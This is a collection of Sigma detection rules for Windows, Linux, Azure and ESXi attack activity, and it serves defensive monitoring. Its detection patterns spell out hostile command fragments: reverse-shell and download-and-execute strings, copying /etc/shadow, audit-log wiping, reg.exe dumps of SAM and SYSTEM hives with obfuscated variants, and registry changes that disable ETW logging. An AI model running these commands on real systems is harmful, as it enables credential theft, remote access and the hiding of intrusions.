date: 2022-11-27
tags:
    - attack.discovery
    - attack.t1087.004
    - attack.t1526
logsource:
    product: azure
    service: signinlogs
detection:
    selection:
        userAgent|contains: 'azurehound'
        ResultType: 0
    condition: selection
falsepositives:
    - Unknown
level: high

title: Dllhost.EXE Execution Anomaly
id: e7888eb1-13b0-4616-bd99-4bc0c2b054b9
status: test
description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
references:
    - https://redcanary.com/blog/child-processes/
    - https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-27
modified: 2023-05-15
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\dllhost.exe'
        CommandLine:
            - 'dllhost.exe'
            - 'dllhost'
    filter_main_null:
        CommandLine: null
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: high

title: DotNet CLR DLL Loaded By Scripting Applications
id: 4508a70e-97ef-4300-b62b-ff27992990ea
status: test
description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
references:
    - https://github.com/tyranid/DotNetToJScript
    - https://thewover.github.io/Introducing-Donut/
    - https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html
    - https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008
author: omkar72, oscd.community
date: 2020-10-14
modified: 2023-02-23
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith:
            - '\cmstp.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\msxsl.exe'
            - '\regsvr32.exe'
            # - '\svchost.exe'
            - '\wmic.exe'
            - '\wscript.exe'
        ImageLoaded|endswith:
            - '\clr.dll'
            - '\mscoree.dll'
            - '\mscorlib.dll'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Driver Added To Disallowed Images In HVCI - Registry
id: 555155a2-03bf-4fe7-af74-d176b3fdbe16
related:
    - id: 44cee399-f6b1-45cc-a87c-ea14c6064d6b
      type: similar
status: test
description: |
    Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
references:
    - https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf
    - https://x.com/yarden_shafir/status/1822667605175324787
author: Nasreddine Bencherchali (Nextron Systems), Omar Khaled (@beacon_exe)
date: 2023-12-05
modified: 2024-08-21
tags:
    - attack.stealth
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains|all:
            - '\Control\CI\'
            - '\HVCIDisallowedImages'
    condition: selection
falsepositives:
    - Legitimate usage of this key would also trigger this. Investigate the driver being added and make sure its intended
level: high

title: Driver Load From A Temporary Directory
id: 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75
status: test
description: Detects a driver load from a temporary directory
references:
    - Internal Research
author: Florian Roth (Nextron Systems)
date: 2017-02-12
modified: 2021-11-27
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
logsource:
    category: driver_load
    product: windows
detection:
    selection:
        ImageLoaded|contains: '\Temp\'
    condition: selection
falsepositives:
    - There is a relevant set of false positives depending on applications in the environment
level: high

title: Dumping of Sensitive Hives Via Reg.EXE
id: fd877b94-9bb5-4191-bb25-d79cbd93c167
related:
    - id: 038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e
      type: obsolete
    - id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0
      type: obsolete
status: test
description: Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.
references:
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
    - https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md
    - https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
author: Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113
date: 2019-10-22
modified: 2023-12-13
tags:
    - attack.credential-access
    - attack.t1003.002
    - attack.t1003.004
    - attack.t1003.005
    - car.2013-07-001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\reg.exe'
        - OriginalFileName: 'reg.exe'
    selection_cli_flag:
        CommandLine|contains:
            - ' save '
            - ' export '
            - ' ˢave '
            - ' eˣport '
    selection_cli_hklm:
        CommandLine|contains:
            - 'hklm'
            - 'hk˪m'
            - 'hkey_local_machine'
            - 'hkey_˪ocal_machine'
            - 'hkey_loca˪_machine'
            - 'hkey_˪oca˪_machine'
    selection_cli_hive:
        CommandLine|contains:
            - '\system'
            - '\sam'
            - '\security'
            - '\ˢystem'
            - '\syˢtem'
            - '\ˢyˢtem'
            - '\ˢam'
            - '\ˢecurity'
    condition: all of selection_*
falsepositives:
    - Dumping hives for legitimate purpouse i.e. backup or forensic investigation
level: high

title: ESXi Admin Permission Assigned To Account Via ESXCLI
id: 9691f58d-92c1-4416-8bf3-2edd753ec9cf
status: test
description: Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account.
references:
    - https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-04
tags:
    - attack.persistence
    - attack.execution
    - attack.privilege-escalation
    - attack.t1059.012
    - attack.t1098
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/esxcli'
        CommandLine|contains: 'system'
        CommandLine|contains|all:
            - ' permission '
            - ' set'
            - 'Admin'
    condition: selection
falsepositives:
    - Legitimate administration activities
level: high

title: ETW Logging Disabled In .NET Processes - Registry
id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
related:
    - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
      type: similar
status: test
description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
    - https://twitter.com/_xpn_/status/1268712093928378368
    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
    - https://bunnyinside.com/?term=f71e8cb9c76a
    - http://managed670.rssing.com/chan-5590147/all_p1.html
    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-06-05
modified: 2022-12-20
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - attack.t1685
logsource:
    product: windows
    service: security
detection:
    selection_etw_enabled:
        EventID: 4657
        ObjectName|endswith: '\SOFTWARE\Microsoft\.NETFramework'
        ObjectValueName: 'ETWEnabled'
        NewValue: 0
    selection_complus:
        EventID: 4657
        ObjectName|contains: '\Environment'
        ObjectValueName:
            - 'COMPlus_ETWEnabled'
            - 'COMPlus_ETWFlags'
        NewValue: 0
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: ETW Logging Disabled In .NET Processes - Sysmon Registry
id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544
related:
    - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc
      type: similar
status: test
description: Potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
    - https://twitter.com/_xpn_/status/1268712093928378368
    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
    - https://bunnyinside.com/?term=f71e8cb9c76a
    - http://managed670.rssing.com/chan-5590147/all_p1.html
    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
    - https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/
    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-06-05
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
    - attack.t1685
logsource:
    product: windows
    category: registry_set
detection:
    selection_etw_enabled:
        TargetObject|endswith: 'SOFTWARE\Microsoft\.NETFramework\ETWEnabled'
        Details: 'DWORD (0x00000000)'
    selection_complus:
        TargetObject|endswith:
            - '\COMPlus_ETWEnabled'
            - '\COMPlus_ETWFlags'
        Details:
            - 0 # For REG_SZ type
            - 'DWORD (0x00000000)'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: ETW Logging Tamper In .NET Processes Via CommandLine
id: 41421f44-58f9-455d-838a-c398859841d4
status: test
description: |
    Detects changes to environment variables related to ETW logging via the CommandLine.
    This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
references:
    - https://twitter.com/_xpn_/status/1268712093928378368
    - https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr
    - https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables
    - https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38
    - https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39
    - https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_
    - https://bunnyinside.com/?term=f71e8cb9c76a
    - http://managed670.rssing.com/chan-5590147/all_p1.html
    - https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code
    - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-05-02
modified: 2022-12-09
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - 'COMPlus_ETWEnabled'
            - 'COMPlus_ETWFlags'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: ETW Trace Evasion Activity
id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
status: test
description: |
    Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
    - https://abuse.io/lockergoga.txt
    - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
author: '@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community'
date: 2019-03-22
modified: 2022-06-28
tags:
    - attack.stealth
    - attack.defense-impairment
    - attack.t1070
    - attack.t1685
    - car.2016-04-002
logsource:
    category: process_creation
    product: windows
detection:
    selection_clear_1:
        CommandLine|contains|all:
            - 'cl'
            - '/Trace'
    selection_clear_2:
        CommandLine|contains|all:
            - 'clear-log'
            - '/Trace'
    selection_disable_1:
        CommandLine|contains|all:
            - 'sl'
            - '/e:false'
    selection_disable_2:
        CommandLine|contains|all:
            - 'set-log'
            - '/e:false'
    selection_disable_3:   # ETW provider removal from a trace session
        CommandLine|contains|all:
            - 'logman'
            - 'update'
            - 'trace'
            - '--p'
            - '-ets'
    selection_pwsh_remove:   # Autologger provider removal
        CommandLine|contains: 'Remove-EtwTraceProvider'
    selection_pwsh_set:   # Provider “Enable” property modification
        CommandLine|contains|all:
            - 'Set-EtwTraceProvider'
            - '0x11'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: Email Exifiltration Via Powershell
id: 312d0384-401c-4b8b-abdf-685ffba9a332
status: test
description: Detects email exfiltration via powershell cmdlets
references:
    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
    - https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml
author: Nasreddine Bencherchali (Nextron Systems),  Azure-Sentinel (idea)
date: 2022-09-09
tags:
    - attack.exfiltration
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains|all:
            - 'Add-PSSnapin'
            - 'Get-Recipient'
            - '-ExpandProperty'
            - 'EmailAddresses'
            - 'SmtpAddress'
            - '-hidetableheaders'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Enable LM Hash Storage
id: c420410f-c2d8-4010-856b-dffe21866437
related:
    - id: 98dedfdd-8333-49d4-9f23-d7018cccae53 # process_creation
      type: similar
status: test
description: |
    Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
    By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
references:
    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password
    - https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-12-15
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|endswith: 'System\CurrentControlSet\Control\Lsa\NoLMHash'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Enable LM Hash Storage - ProcCreation
id: 98dedfdd-8333-49d4-9f23-d7018cccae53
related:
    - id: c420410f-c2d8-4010-856b-dffe21866437 # Registry
      type: similar
status: test
description: |
    Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
    By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
references:
    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
    - https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password
    - https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-12-15
modified: 2023-12-22
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains|all:
            - '\System\CurrentControlSet\Control\Lsa'
            - 'NoLMHash'
            - ' 0'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Enabled User Right in AD to Control User Objects
id: 311b6ce2-7890-4383-a8c2-663a9f6b43cd
status: test
description: Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
references:
    - https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
author: '@neu5ron'
date: 2017-07-30
modified: 2021-12-02
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1098
logsource:
    product: windows
    service: security
    definition: 'Requirements: Audit Policy : Policy Change > Audit Authorization Policy Change, Group Policy : Computer Configuration\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Authorization Policy Change'
detection:
    selection_base:
        EventID: 4704
    selection_keywords:
        PrivilegeList|contains: 'SeEnableDelegationPrivilege'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

title: Equation Group Indicators
id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
status: test
description: Detects suspicious shell commands used in various Equation Group scripts and tools
references:
    - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
author: Florian Roth (Nextron Systems)
date: 2017-04-09
modified: 2021-11-27
tags:
    - attack.execution
    - attack.g0020
    - attack.t1059.004
logsource:
    product: linux
detection:
    keywords:
        # evolvingstrategy, elgingamble, estesfox
        - 'chown root*chmod 4777 '
        - 'cp /bin/sh .;chown'
        # tmpwatch
        - 'chmod 4777 /tmp/.scsi/dev/bin/gsh'
        - 'chown root:root /tmp/.scsi/dev/bin/'
        # estesfox
        - 'chown root:root x;'
        # ratload
        - '/bin/telnet locip locport < /dev/console | /bin/sh'
        - '/tmp/ratload'
        # ewok
        - 'ewok -t '
        # xspy
        - 'xspy -display '
        # elatedmonkey
        - 'cat > /dev/tcp/127.0.0.1/80 <<END'
        # ftshell
        - 'rm -f /current/tmp/ftshell.latest'
        # ghost
        - 'ghost_* -v '
        # morerats client
        - ' --wipe > /dev/null'
        # noclient
        - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'
        - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'
        # auditcleaner
        - '> /var/log/audit/audit.log; rm -f .'
        - 'cp /var/log/audit/audit.log .tmp'
        # reverse shell
        - 'sh >/dev/tcp/* <&1 2>&1'
        # packrat
        - 'ncat -vv -l -p * <'
        - 'nc -vv -l -p * <'
        # empty bowl
        - '< /dev/console | uudecode && uncompress'
        - 'sendmail -osendmail;chmod +x sendmail'
        # echowrecker
        - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'
        # dubmoat
        - 'chmod 666 /var/run/utmp~'
        # poptop
        - 'chmod 700 nscd crond'
        # abopscript
        - 'cp /etc/shadow /tmp/.'
        # ys
        - '</dev/console |uudecode > /dev/null 2>&1 && uncompress'
        # jacktelnet
        - 'chmod 700 jp&&netstat -an|grep'
        # others
        - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'
        - 'chmod 700 crond'
        - 'wget http*; chmod +x /tmp/sendmail'
        - 'chmod 700 fp sendmail pt'
        - 'chmod 755 /usr/vmsys/bin/pipe'
        - 'chmod -R 755 /usr/vmsys'
        - 'chmod 755 $opbin/*tunnel'
        - 'chmod 700 sendmail'
        - 'chmod 0700 sendmail'
        - '/usr/bin/wget http*sendmail;chmod +x sendmail;'
        - '&& telnet * 2>&1 </dev/console'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: Esentutl Volume Shadow Copy Service Keys
id: 5aad0995-46ab-41bd-a9ff-724f41114971
status: test
description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured.
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
date: 2020-10-20
modified: 2022-12-25
tags:
    - attack.credential-access
    - attack.t1003.002
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: 'System\CurrentControlSet\Services\VSS'
        Image|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter
    filter:
        TargetObject|contains: 'System\CurrentControlSet\Services\VSS\Start'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: Exchange PowerShell Cmdlet History Deleted
id: a55349d8-9588-4c5a-8e3b-1925fe2a4ffe
status: test
description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
references:
    - https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-26
modified: 2022-12-30
tags:
    - attack.stealth
    - attack.t1070
logsource:
    category: file_delete
    product: windows
detection:
    selection:
        TargetFilename|startswith: '\Logging\CmdletInfra\LocalPowerShell\Cmdlet\'
        TargetFilename|contains: '_Cmdlet_'
    condition: selection
falsepositives:
    - Possible FP during log rotation
level: high

title: Exchange PowerShell Snap-Ins Usage
id: 25676e10-2121-446e-80a4-71ff8506af47
status: test
description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
references:
    - https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
    - https://www.intrinsec.com/apt27-analysis/
author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
date: 2021-03-03
modified: 2023-03-24
tags:
    - attack.execution
    - attack.t1059.001
    - attack.collection
    - attack.t1114
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains: 'Add-PSSnapin'
    selection_module:
        CommandLine|contains:
            - 'Microsoft.Exchange.Powershell.Snapin'
            - 'Microsoft.Exchange.Management.PowerShell.SnapIn'
    filter_msiexec:
        # ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000
        ParentImage: 'C:\Windows\System32\msiexec.exe'
        CommandLine|contains: '$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null'
    condition: all of selection_* and not 1 of filter_*
falsepositives:
    - Unknown
level: high

title: Exchange Set OabVirtualDirectory ExternalUrl Property
id: 9db37458-4df2-46a5-95ab-307e7f29e675
status: test
description: Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
references:
    - https://twitter.com/OTR_Community/status/1371053369071132675
author: Jose Rodriguez @Cyb3rPandaH
date: 2021-03-15
modified: 2023-01-23
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    product: windows
    service: msexchange-management
detection:
    keywords:
        '|all':
            - 'Set-OabVirtualDirectory'
            - 'ExternalUrl'
            - 'Page_Load'
            - 'script'
    condition: keywords
falsepositives:
    - Unknown
level: high

title: Execute Pcwrun.EXE To Leverage Follina
id: 6004abd0-afa4-4557-ba90-49d172e0a299
status: test
description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
references:
    - https://twitter.com/nas_bench/status/1535663791362519040
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\pcwrun.exe'
        CommandLine|contains: '../'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Execution DLL of Choice Using WAB.EXE
id: fc014922-5def-4da9-a0fc-28c973f41bfb
status: test
description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
references:
    - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml
    - https://twitter.com/Hexacorn/status/991447379864932352
    - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
author: oscd.community, Natalia Shornikova
date: 2020-10-13
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Software\Microsoft\WAB\DLLPath'
    filter:
        Details: '%CommonProgramFiles%\System\wab32.dll'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: Execution Of Non-Existing File
id: 71158e3f-df67-472b-930e-7d287acaa3e1
status: test
description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
references:
    - https://pentestlaboratories.com/2021/12/08/process-ghosting/
author: Max Altgelt (Nextron Systems)
date: 2021-12-09
modified: 2022-12-14
tags:
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    image_absolute_path:
        Image|contains: '\'
    filter_null:
        Image: null
    filter_empty:
        Image:
            - '-'
            - ''
    filter_4688:
        - Image:
              - 'System'
              - 'Registry'
              - 'MemCompression'
              - 'vmmem'
        - CommandLine:
              - 'Registry'
              - 'MemCompression'
              - 'vmmem'
    condition: not image_absolute_path and not 1 of filter*
falsepositives:
    - Unknown
level: high

title: Execution of Powershell Script in Public Folder
id: fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4
status: test
description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
references:
    - https://www.mandiant.com/resources/evolution-of-fin7
author: Max Altgelt (Nextron Systems)
date: 2022-04-06
modified: 2022-07-14
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - '-f C:\Users\Public'
            - '-f "C:\Users\Public'
            - '-f %Public%'
            - '-fi C:\Users\Public'
            - '-fi "C:\Users\Public'
            - '-fi %Public%'
            - '-fil C:\Users\Public'
            - '-fil "C:\Users\Public'
            - '-fil %Public%'
            - '-file C:\Users\Public'
            - '-file "C:\Users\Public'
            - '-file %Public%'
    condition: selection
falsepositives:
    - Unlikely
level: high